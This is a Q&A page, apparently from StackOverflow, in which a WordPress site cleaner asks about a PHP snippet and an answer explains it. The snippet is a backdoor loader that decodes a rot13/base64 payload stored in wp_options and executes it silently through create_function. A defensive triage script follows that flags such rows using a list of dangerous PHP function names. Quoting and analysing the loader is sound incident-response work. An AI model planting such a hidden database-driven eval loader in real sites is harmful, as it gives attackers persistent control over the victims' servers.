Question

I'm cleaning some hacked wordpress sites right now, but can't work out what this code actually does. Thought it would probably be useful to know. Can anyone help me decipher it?

$z = get_option("_site_transient_poptags_29129c90ada88ec96b7881049ab64b45");
$z = base64_decode(str_rot13($z['photo']));
if (strpos($z, "5F88EE48") !== false) {
    $_z = create_function("", $z);
    @$_z();
}

Solution

get_option will look at table wp_options for a key with that name _site_transient_poptags_29129c90ada88ec96b7881049ab64b45

it's the same as doing

select option_value from wp_options where option_name='_site_transient_poptags_29129c90ada88ec96b7881049ab64b45';

Whatever that option_value is, get_option will try to unserialize it before returning it. This is where it gets nasty, because unserialized data can be of any type. In this case option_value was a string which got unserialized to an array.

This array probably has one or more key=>value pairs. In this case, the one that matters is under the photo key. The value of that key is rot13'd and base64_decoded. Both the rot13 and base64_decode parts are only meant to 'translate' what will appear as random characters and store a readable string into the variable $z. It's as elaborate as spelling it backwards.

If the variable $z contains the substring 5F88EE48 then it will create an anonymous function, whose content is the value of $z (which means it performs an evaluation of $z) and it immediately fires itself with the @ error suppressor character, in order not to raise errors, exceptions or leave logs.

As you might know, if your site was compromised there is no real clean method but to reinstall the code, and even if you do, you might still have compromised fields in your DB. This is like peeing in a pool and then trying to get the pee out of it.
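An added example, not part of the question or the answer: an offline PHP (7.4+) triage script for the storage pattern the answer describes. It assumes a constructed set of wp_options rows (the transient name is the one from the question; the payload is a harmless marker string), reverses the same str_rot13 + base64 chain, and flags rows whose decoded value looks like PHP, without ever executing anything.

```php
<?php
// Added example: offline triage of wp_options rows for the rot13 + base64
// pattern described above. Nothing decoded here is ever executed. $rows is a
// constructed stand-in for: select option_name, option_value from wp_options

// Tokens whose presence in a decoded value make a row worth a manual look.
const SUSPICIOUS_TOKENS = ['create_function', 'eval(', 'base64_decode', 'assert(', 'system(', 'shell_exec'];

// Reverse the obfuscation; strict base64 rejects characters outside the alphabet.
function decode_rot13_base64(string $blob): ?string {
    $decoded = base64_decode(str_rot13($blob), true);
    return $decoded === false ? null : $decoded;
}

// Inspect one serialized option_value. Returns one finding per suspicious
// array element, or an empty array when nothing stands out.
function triage_option(string $name, string $serialized): array {
    // allowed_classes => false: never instantiate objects from untrusted data.
    $value = @unserialize($serialized, ['allowed_classes' => false]);
    if (!is_array($value)) return [];
    $findings = [];
    foreach ($value as $key => $item) {
        if (!is_string($item) || strlen($item) < 16) continue;
        $decoded = decode_rot13_base64($item);
        if ($decoded === null) continue;
        $hits = array_values(array_filter(SUSPICIOUS_TOKENS, fn($t) => stripos($decoded, $t) !== false));
        if ($hits) {
            $findings[] = ['option' => $name, 'key' => $key, 'tokens' => $hits, 'preview' => substr($decoded, 0, 60)];
        }
    }
    return $findings;
}

// Constructed rows: the first mimics the backdoor's storage format, with a
// harmless marker string where the real payload would be.
$payload = "/* 5F88EE48 */ \$f = create_function('', 'return 1;');";
$rows = [
    '_site_transient_poptags_29129c90ada88ec96b7881049ab64b45' => serialize(['photo' => str_rot13(base64_encode($payload))]),
    'blogname' => serialize('My Blog'),
    'active_plugins' => serialize(['akismet/akismet.php']),
];

foreach ($rows as $name => $serialized) {
    foreach (triage_option($name, $serialized) as $f) {
        printf("%s [%s]: %s => %s\n", $f['option'], $f['key'], implode(',', $f['tokens']), $f['preview']);
    }
}
```

Run against a real dump, only the transient row above is reported; a hit is a reason to inspect and reinstall, not proof that the rest of the database is clean.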

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow